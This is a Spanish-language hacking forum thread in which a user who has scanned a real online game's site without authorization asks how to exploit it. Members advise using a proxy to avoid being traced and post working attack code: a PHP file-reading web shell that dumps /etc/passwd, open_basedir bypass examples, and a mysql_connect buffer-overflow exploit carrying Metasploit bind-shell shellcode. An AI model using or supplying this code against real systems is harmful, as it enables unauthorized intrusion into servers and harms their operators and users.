Escaneo a Ogame.com.es

yago_16
Miembro

Desconectado

Mensajes: 29

Escaneo a Ogame.com.es

« en: Agosto 18, 2006, 05:24:37 »

Bueno soy un fan de esta pagina no se si la conoceis es de un juego en tiempo real, bueno la cosa esk le paso un escaneo con el sss y me dio bastantes vulnerabilidades, pero resulta que no se que hacer una vez que tengo listo el xploit, que puedo conseguir con el xploit? se k es para penetrar en los bugs del servidor pero k opciones me da el xploit?? me e leido todos los posts de empezando desde 0.
Aki os dejo la foto de las vulnerabilidades a ver si me podeis decir algo por favor.

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion
He conseguido conectarme con el servidor por medio de un exploit pero despues no se que hacer.


« Última modificación: Agosto 18, 2006, 05:51:33 por yago_16 »	En línea

OzX
Moderadores
Gran Colaborador

Desconectado

Mensajes: 2144

http://foro.undersecurity.net

Re: Escaneo a Ogame.com.es

« Respuesta #1 en: Agosto 18, 2006, 06:04:01 »

mmm es exploit no xploit..
el exploit al lanzarlo te da las instrucciones ....

es tipico que tengan algun ejemplo...
ten cuidado que haboo puede localizar si no ocupas proxy Cheesy

no agas sin cambiar tu ip
un sano consejo

bueno si ya lanzaste el exploit, excelente, como te decia recien las instrucciones salen en cada exploit. con un ej.
adios

pd: puedes subir el exploit.exe a rapiadshare o uploading, para ver de que se trata.
adios


	En línea

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

yago_16
Miembro

Desconectado

Mensajes: 29

Re: Escaneo a Ogame.com.es

« Respuesta #2 en: Agosto 19, 2006, 12:28:30 »

mejor te dejo el codigo del exploit para k lo puedas analizar, y decirme de k se trata xk no lo se xD.
ON (secure)"; } else {$safemode = false; $hsafemode = "OFF (not secure)";} echo("Safe-mode: $hsafemode"); $v = @ini_get("open_basedir"); if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";} else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} echo("
"); echo("Open base dir: $hopenbasedir"); echo("
"); $version=("Safe Mode Shell 1.5(beta)"); echo "Disable functions : "; if(''==($df= @ini_get('disable_functions'))){echo "NONE";}else{echo "$df";} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;} $used = $all-$free; $used_percent = @round(100/($all/$free),2); error_reporting(E_WARNING); ini_set("display_errors", 1); echo "
\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like
?file=/etc/passwd\n MaDe By D3nGeR
");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}

$temp=tempnam($tymczas, "cx");

if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "--- Start File ".htmlspecialchars($file)."
-------------\n".htmlspecialchars($tekst)."\n--- End File
".htmlspecialchars($file)." ---------------\n";
unlink($temp);
die("\nFile
".htmlspecialchars($file)." has been already loaded. D3nGeR
;]");
} else {
die("

PD: Esto es el ejemplo que viene k tmpoco se como usarlo:

An example statement exploiting the 'copy()' issue is available:

copy("compress.zlib:///etc/passwd", "/home/<username>/passwd.txt");

An example statement exploiting the 'tempnam()' issue is available:

tempnam("path_from_open_basedir", "../../../../../../../../Open_basedir_bypasswd");


	En línea

OzX
Moderadores
Gran Colaborador

Desconectado

Mensajes: 2144

http://foro.undersecurity.net

Re: Escaneo a Ogame.com.es

« Respuesta #3 en: Agosto 19, 2006, 07:44:34 »

seria ideal si suvieras el codigo a uploading.com o rapidshare porque por aka se ve mal.
o nos dices la url de donde lo sakaste..
pero creo , ojala que los que saven me corraboren, este es como un exploit de ejemplo.. no tan funcional...


	En línea

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Pr0gr4mer
Colaborador

Desconectado

Mensajes: 865

Pr0gr4mer al mango

Re: Escaneo a Ogame.com.es

« Respuesta #4 en: Agosto 20, 2006, 12:08:45 »

yago_16 dejame la URL de securityfocus de todos los exploits con los cuadraditos rojos y veo como te los explico.

Pr0gr4mer


	En línea

Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

San Buscador

.::Pr0gr4mer::.

yago_16
Miembro

Desconectado

Mensajes: 29

Re: Escaneo a Ogame.com.es

« Respuesta #5 en: Agosto 20, 2006, 03:00:16 »

buah muchas gracias x interesarte pr0gr4mer Cheesy

me an servido muxos tus posts gracias Tongue

bueno kreo k te referias a estos urls si no es asi dimelo, muchos no tienen exploits, gracias x ayudarme de verdad Cheesy

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

Ai van todos los rojos.


	En línea

Pr0gr4mer
Colaborador

Desconectado

Mensajes: 865

Pr0gr4mer al mango

Re: Escaneo a Ogame.com.es

« Respuesta #6 en: Agosto 21, 2006, 12:36:01 »

Cita de: yago_16 en Agosto 20, 2006, 03:00:16

buah muchas gracias x interesarte pr0gr4mer Cheesy

me an servido muxos tus posts gracias Tongue

bueno kreo k te referias a estos urls si no es asi dimelo, muchos no tienen exploits, gracias x ayudarme de verdad Cheesy

Mira de todos las url que me pasaste encontre 1 importante jeeje aca te dejo el code:

-----------------------EMPIEZA----------------

<?php

//Exploit for
//   Apache/1.3.33
//   PHP/4.4.0
//Windows only

$eip = "71AB5651"; //EIP - CALL ESI from Winsock 2.0 ws2_32.dll v5.1.2600.0
$esi = "10000000"; //ESI - Temporary. The memory under this location will be trashed.

//Metasploit win32 bind shell on port 4444
//Thread exit method, no filter
$shellcode = pack("H*","fc6aeb4de8f9ffffff608b6c24248b453c8b7c057801ef8b4f188b5f2001eb498b348b01ee31c099ac84c07407c1ca0d01c2ebf43b54242875e58b5f2401eb668b0c4b8b5f1c01eb032c8b896c241c61c331db648b43308b400c8b701cad8b40085e688e4e0eec50ffd6665366683332687773325f54ffd068cbedfc3b50ffd65f89e56681ed0802556a02ffd068d909f5ad57ffd6535353535343534353ffd06668115c665389e19568a41a70c757ffd66a105155ffd068a4ad2ee957ffd65355ffd068e549864957ffd650545455ffd09368e779c67957ffd655ffd0666a646668636d89e56a505929cc89e76a4489e231c0f3aafe422dfe422c938d7a38ababab6872feb316ff7544ffd65b57525151516a0151515551ffd068add905ce53ffd66affff37ffd08b57fc83c464ffd652ffd068efcee06053ffd6ffd0");

//Endian conversion
$eip = substr($eip, 6, 2) . substr($eip, 4, 2) . substr($eip, 2, 2) . substr($eip, 0, 2);
$esi = substr($esi, 6, 2) . substr($esi, 4, 2) . substr($esi, 2, 2) . substr($esi, 0, 2);

$overflowstring = "localhost:/";
$overflowstring .= "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";
$overflowstring .= pack("H*",$eip);   //EIP
$overflowstring .= pack("H*",$esi);   //ESI
$overflowstring .= "/";

//If we don't define this, our shellcode gets truncated
$two = "AAAAAAAAAA";

mysql_connect($overflowstring, $shellcode);

?>

----------TERMINA-------------

Si te das cuenta el exploit actua sobre el apache de la web, tienes que subirlo a un server que sostenga al php para poder usarlo via shell.

PD: Me encontre con algo interesante en una url de securityfocus... casi me mete un troyano en la pC Cheesy

Pr0gr4mer


	En línea

Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

San Buscador

.::Pr0gr4mer::.

yago_16
Miembro

Desconectado

Mensajes: 29

Re: Escaneo a Ogame.com.es

« Respuesta #7 en: Agosto 21, 2006, 03:50:59 »

muchas gracias pr0gr4mer x buscarme el exploit pero esk ai un problema xD k soy demasiado newbie con esto y no se ni x donde empezar

se k tengo k compilar el exploit pero despues de mandarlo que ago??


	En línea

Pr0gr4mer
Colaborador

Desconectado

Mensajes: 865

Pr0gr4mer al mango

Re: Escaneo a Ogame.com.es

« Respuesta #8 en: Agosto 22, 2006, 01:29:58 »

Cita de: yago_16 en Agosto 21, 2006, 03:50:59

muchas gracias pr0gr4mer x buscarme el exploit pero esk ai un problema xD k soy demasiado newbie con esto y no se ni x donde empezar

se k tengo k compilar el exploit pero despues de mandarlo que ago??

Es que ya me estas pidiendo que valla a tu casa y que te aga todo jajaja! mira busca informacion sobre el uso de exploits, que
aqui en este foro tienes bastantes, y ademas busca sobre la utilizacion de exploits programadors en PHP.

Pr0gr4mer


	En línea

Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

San Buscador

.::Pr0gr4mer::.

OzX
Moderadores
Gran Colaborador

Desconectado

Mensajes: 2144

http://foro.undersecurity.net

Re: Escaneo a Ogame.com.es

« Respuesta #9 en: Agosto 22, 2006, 03:56:12 »

PHP MySQL_Connect Remote Buffer Overflow Vulnerability

Sample exploit code has been provided.

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

http://www.securityfocus.com/data/vulnerabilities/exploits/phpflaw.obj

cuidadooooooooo que es un troyano... eso lo q decia programer Cheesy

jawjajwjaw
-----------------------------------------------------------------------------------------------------------------

o pasaete por aka
y busca php

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

http://www.milw0rm.com/search.php


	En línea

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

yago_16
Miembro

Desconectado

Mensajes: 29

Re: Escaneo a Ogame.com.es

« Respuesta #10 en: Agosto 22, 2006, 03:58:33 »


« Última modificación: Agosto 22, 2006, 04:00:20 por yago_16 »	En línea

dkhecker22
Visitante

Re: Escaneo a Ogame.com.es

« Respuesta #11 en: Enero 20, 2007, 01:57:32 »

he intentado compilar este exploit pero no he podido


	En línea

Páginas: [1]

Comunidad Underground Hispana \| Phreaking, Hacking y Seguridad \| Bug y Exploits (Moderadores: OzX, y0u-uNsEcUre) \| Tema: Escaneo a Ogame.com.es	« anterior próximo »

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Noviembre 18, 2008, 07:25:02